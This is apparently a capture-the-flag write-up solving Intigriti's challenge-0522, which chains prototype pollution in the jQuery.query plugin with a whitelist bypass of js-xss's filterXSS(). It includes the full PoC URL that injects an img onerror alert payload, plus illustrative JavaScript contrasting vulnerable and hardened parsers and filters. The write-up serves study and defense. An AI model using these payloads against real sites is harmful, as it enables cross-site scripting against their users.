Came across Intigriti's recent XSS challenge this evening. It tests two points: Prototype Pollution, and using that pollution to bypass filterXSS(). The challenge flows well and is fun to play, but more on that later -_-
Down to business:
https://challenge-0522.intigriti.io/challenge/challenge.html?page=1
Right-click, view source, and look for the exploitable spot.
There is a pages object holding three pages (keys 1 to 3) plus, under key 4, the navigation dropdown. The url's page parameter selects the entry. Note where the filter sits: filterXSS() is applied to the looked-up content, pages[pl], not to the page parameter itself, and the result is written into #root with innerHTML.
<script>
var pages = {
1: `HOME
<h5>Pollution is consuming the world. It's killing all the plants and ruining nature, but we won't let that happen! Our products will help you save the planet and yourself by purifying air naturally.</h5>`,
2: `PRODUCTS
<br>
<footer>
<img src="https://miro.medium.com/max/1000/1*Cd9sLiby5ibLJAkixjCidw.jpeg" width="150" height="200" alt="Snake Plant"></img><span>Snake Plant</span>
</footer>
<footer>
<img src="https://miro.medium.com/max/1000/1*wlzwrBXYoDDkaAag_CT-AA.jpeg" width="150" height="200" alt="Areca Palm"></img><span>Areca Palm</span>
</footer>
<footer>
<img src="https://miro.medium.com/max/1000/1*qn_6G8NV4xg_J0luFbY47w.jpeg" width="150" height="200" alt="Rubber Plant"></img><span>Rubber Plant</span>
</footer>`,
3: `CONTACT
<br><br>
<b>
<a href="https://www.facebook.com/intigriticom/"><img src="https://cdn-icons-png.flaticon.com/512/124/124010.png" width="50" height="50" alt="Facebook"></img></a>
<a href="https://www.linkedin.com/company/intigriti/"><img src="https://cdn-icons-png.flaticon.com/512/61/61109.png" width="50" height="50" alt="LinkedIn"></img></a>
<a href="https://twitter.com/intigriti"><img src="https://cdn-icons-png.flaticon.com/512/124/124021.png" width="50" height="50" alt="Twitter"></img></a>
<a href="https://www.instagram.com/hackwithintigriti/"><img src="https://cdn-icons-png.flaticon.com/512/174/174855.png" width="50" height="50" alt="Instagram"></img></a>
</b>
`,
4: `
<div class="dropdown">
<div id="myDropdown" class="dropdown-content">
<a href = "?page=1">Home</a>
<a href = "?page=2">Products</a>
<a href = "?page=3">Contact</a>
</div>
</div>`
};
var pl = $.query.get('page');
if(pages[pl] != undefined){
console.log(pages);
document.getElementById("root").innerHTML = pages['4']+filterXSS(pages[pl]);
}else{
document.location.search = "?page=1"
}
</script>
By now the rough plan should be clear: find a way to add a payload such as <script>alert(document.domain)</script> to the pages object and get it past filterXSS(), so that navigating to that page pops the alert. One caveat to keep in mind: markup written via innerHTML does not execute <script> elements, so the working payload will have to be an event handler such as onerror on a tag the filter lets through, rather than a script tag.
But pages is hard-coded, so to get anything into it we will probably have to find a vulnerability in the three pieces of JavaScript the page pulls in.
<script src="https://cdnjs.cloudflare.com/ajax/libs/js-xss/0.3.3/xss.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.js"></script>
<script>
/**
* jQuery.query - Query String Modification and Creation for jQuery
Let's look at the three in turn (two external scripts plus the inline jQuery.query plugin):
js-xss 0.3.3: filters HTML against a whitelist (to prevent XSS) https://jsxss.com/zh/index.html
jquery-3.5.1: a recent release (3.6.0 was already out by then, but nothing useful is known against 3.5.1)
jQuery.query: Query String Modification and Creation for jQuery
With jQuery being recent, the odds of a usable bug there are low, so the jQuery.query plugin is the place to start. A quick search turns up a Prototype Pollution vulnerability in version 2.2.3 (CVE-2021-20083).
For background on what a Prototype Pollution vulnerability is, see
《深入理解 JavaScript Prototype 污染攻击》(A deep dive into JavaScript prototype pollution attacks) https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html
which I won't repeat here.
A bit more googling turns up the PoC:
?__proto__[test]=test
#__proto__[test]=test
Test it: the pollution works, and the content is written into the page.
The <h1> tag renders because h1 is on js-xss's default whitelist, but the other PoCs get filtered, so the next step is to try to bypass js-xss.
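To make the mechanics concrete, here is an added example, not the jQuery.query plugin's code nor the challenge's, of a minimal bracket-notation query parser written in the same style (walking "a[b][0]" segments into nested objects, with numeric segments turned into arrays, which is assumed to mirror the plugin's behaviour), run against the challenge's `pages[pl] != undefined` check. It also carries a hardened parser and an own-property page lookup, plus a quick check for whether Object.prototype has been polluted. parseQueryVulnerable, parseQuerySafe, lookupPageVulnerable, lookupPageSafe, prototypeIsPolluted and simulate are the example's own names, and PAGES is a stand-in for the challenge's pages object.

```javascript
// Added example (not jQuery.query's own code): why "?__proto__[test]=x"
// pollutes Object.prototype, and why `pages[pl] != undefined` then accepts
// an attacker-chosen page name.

const UNSAFE_KEYS = ['__proto__', 'constructor', 'prototype'];

// Walk "a[b][0]" into nested objects/arrays. Numeric segments become arrays
// (assumed to match the plugin's handling of "...[0]=" keys). `guard` decides
// whether a segment may be used as a property name.
function parseQuery(search, guard) {
  const out = {};
  for (const pair of search.replace(/^[?#]/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const val = decodeURIComponent(eq === -1 ? '' : pair.slice(eq + 1));
    const segs = key.replace(/\]/g, '').split('[');   // "a[b][c]" -> ["a","b","c"]
    if (!segs.every(guard)) continue;                  // guard always passes in the vulnerable variant
    let cur = out;
    for (let i = 0; i < segs.length - 1; i++) {
      const s = segs[i];
      // No own-property check: cur["__proto__"] resolves to Object.prototype,
      // so the remaining segments are written onto the shared prototype.
      if (typeof cur[s] !== 'object' || cur[s] === null) {
        cur[s] = /^\d+$/.test(segs[i + 1]) ? [] : {};
      }
      cur = cur[s];
    }
    cur[segs[segs.length - 1]] = val;
  }
  return out;
}

function parseQueryVulnerable(search) { return parseQuery(search, () => true); }
// Hardened: drop any key that contains a prototype-walking segment.
function parseQuerySafe(search) {
  return parseQuery(search, (s) => UNSAFE_KEYS.indexOf(s) === -1);
}

// Stand-in for the challenge's pages object (constructed for this example).
const PAGES = { 1: 'HOME', 2: 'PRODUCTS', 3: 'CONTACT' };

// The challenge's check: property access walks the prototype chain, so a
// polluted Object.prototype.test counts as a page.
function lookupPageVulnerable(pages, pl) {
  return pages[pl] != undefined ? pages[pl] : null;
}
// Own-property check: only real entries of `pages` are accepted.
function lookupPageSafe(pages, pl) {
  return Object.prototype.hasOwnProperty.call(pages, pl) ? pages[pl] : null;
}

// Built-in members of Object.prototype are non-enumerable, so any enumerable
// key on it was added at runtime: a cheap pollution indicator.
function prototypeIsPolluted() {
  return Object.keys(Object.prototype).length > 0;
}

// End to end: parse a challenge-style URL, then resolve the page the way the
// challenge does. Cleans Object.prototype afterwards so it can run repeatedly.
function simulate(search, parser, lookup) {
  try {
    const q = parser(search);
    return { polluted: prototypeIsPolluted(), page: lookup(PAGES, q.page) };
  } finally {
    for (const k of Object.keys(Object.prototype)) delete Object.prototype[k];
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  const url = '?page=test&__proto__[test]=%3Cimg%20src%20onerror%3Dalert(1)%3E';
  console.log(simulate(url, parseQueryVulnerable, lookupPageVulnerable));
  console.log(simulate(url, parseQueryVulnerable, lookupPageSafe));
  console.log(simulate(url, parseQuerySafe, lookupPageVulnerable));
}
```

Either fix on its own closes the hole in this page: the hardened parser never touches Object.prototype, and the own-property lookup ignores it even if something else pollutes it. In a real application you want both, since the parser is shared library code and the lookup is yours.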
Found a PoC; the reasoning behind it is explained here:
https://www.4hou.com/index.php/posts/mG5E
?__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src
<script src="https://cdnjs.cloudflare.com/ajax/libs/js-xss/0.3.3/xss.min.js"></script>
<script>
Object.prototype.whiteList = {img: ['onerror', 'src']}
</script>
<script>
document.write(filterXSS('<img src onerror=alert(1)>'))
</script>
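To show why polluting whiteList is enough, here is an added example (not js-xss's own code) of a toy attribute filter that resolves its whitelist with the `options.whiteList || DEFAULT` lookup pattern the bypass relies on (an assumption about how the library reads its options), next to a hardened variant that only honours an own property of the options object. DEFAULT_WHITELIST, filterWith, filterXSSVulnerable, filterXSSHardened and demoBypass are the example's own names; the whitelist contents are constructed for the example.

```javascript
// Added example (not js-xss's code): a toy whitelist filter whose option
// lookup walks the prototype chain, beside one that does not.

// Constructed default whitelist: tag -> allowed attribute names.
const DEFAULT_WHITELIST = {
  a: ['href', 'title', 'target'],
  img: ['src', 'alt', 'width', 'height'],
  h1: [], h5: [], b: [], br: [], span: [], footer: [], div: ['class', 'id'],
};

// Shared rewriter. `resolveWhiteList` is the only difference between the
// vulnerable and hardened variants. Unknown tags are escaped (their text
// survives); known tags keep only whitelisted attributes.
function filterWith(html, options, resolveWhiteList) {
  const whiteList = resolveWhiteList(options || {});
  const has = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
  return html.replace(/<(\/?)([a-zA-Z][\w-]*)([^>]*)>/g, (m, slash, tag, rest) => {
    tag = tag.toLowerCase();
    if (!has(whiteList, tag)) {
      return m.replace(/</g, '&lt;').replace(/>/g, '&gt;');
    }
    if (slash) return '</' + tag + '>';
    const allowed = Array.isArray(whiteList[tag]) ? whiteList[tag] : [];
    const kept = [];
    const attrRe = /([\w-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
    let a;
    while ((a = attrRe.exec(rest)) !== null) {
      const name = a[1].toLowerCase();
      if (allowed.indexOf(name) === -1) continue;       // drop e.g. onerror
      const value = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : a[4];
      kept.push(value === undefined ? name : name + '="' + value.replace(/"/g, '&quot;') + '"');
    }
    return '<' + tag + (kept.length ? ' ' + kept.join(' ') : '') + '>';
  });
}

// Vulnerable: `o.whiteList` on a plain {} falls through to
// Object.prototype.whiteList, so a polluted prototype replaces the defaults.
function filterXSSVulnerable(html, options) {
  return filterWith(html, options, (o) => o.whiteList || DEFAULT_WHITELIST);
}

// Hardened: only an own property of the caller's options can override the
// defaults; anything reachable only through the prototype chain is ignored.
function filterXSSHardened(html, options) {
  return filterWith(html, options, (o) =>
    Object.prototype.hasOwnProperty.call(o, 'whiteList') ? o.whiteList : DEFAULT_WHITELIST);
}

// Runs the same payload before and after the PoC's pollution, then restores
// Object.prototype so the process is left clean.
function demoBypass() {
  const payload = '<img src onerror=alert(1)>';
  const before = filterXSSVulnerable(payload);
  Object.prototype.whiteList = { img: ['onerror', 'src'] };   // same pollution as the PoC URL
  try {
    return {
      before,
      polluted: filterXSSVulnerable(payload),
      hardened: filterXSSHardened(payload),
    };
  } finally {
    delete Object.prototype.whiteList;
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demoBypass());
}
```

The own-property check inside filterWith matters as well: if the whitelist were looked up with a bare `whiteList[tag]`, polluting `Object.prototype.script` or `Object.prototype.img` would also let tags or attributes through even when the whiteList option itself is resolved safely. Freezing the defaults (Object.freeze) or building them with Object.create(null) are the other usual guards.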
Now try the bypass on the challenge itself:
https://challenge-0522.intigriti.io/challenge/challenge.html?page=test&__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src&__proto__[test]=%3Cimg%20src%20onerror%3Dalert(1)%3E
Bingo! The page name test resolves through the polluted prototype, and the polluted whitelist lets the img onerror through filterXSS().
Originally published on the WeChat public account 电驭叛客: Prototype Pollution 和绕过 filterXSS() (Prototype Pollution and bypassing filterXSS())